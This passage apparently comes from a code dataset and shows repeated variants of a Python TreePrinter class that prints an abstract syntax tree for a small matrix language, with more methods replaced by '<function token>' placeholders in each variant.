self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n <function token>\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n <function token>\n <function token>\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in 